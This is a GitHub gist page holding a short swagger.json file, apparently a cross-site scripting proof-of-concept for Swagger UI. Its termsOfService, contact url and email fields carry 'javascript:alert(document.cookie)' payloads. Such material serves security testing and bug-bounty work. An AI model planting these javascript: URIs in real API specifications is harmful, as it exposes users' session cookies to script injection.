Skip to content

Instantly share code, notes, and snippets.

@thehackerish
Created April 13, 2020 12:50
Show Gist options
  • Save thehackerish/435eeee8864dd531c88fe890f8708c43 to your computer and use it in GitHub Desktop.
Save thehackerish/435eeee8864dd531c88fe890f8708c43 to your computer and use it in GitHub Desktop.

Revisions

  1. thehackerish created this gist Apr 13, 2020.
    10 changes: 10 additions & 0 deletions swagger.json
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,10 @@
    swagger: "2.0",
    info:
    title: "Swagger Sample App",
    description: "Please to click Terms of service"
    termsOfService: "javascript:alert(document.cookie)"
    contact:
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
    version: "1.0.1"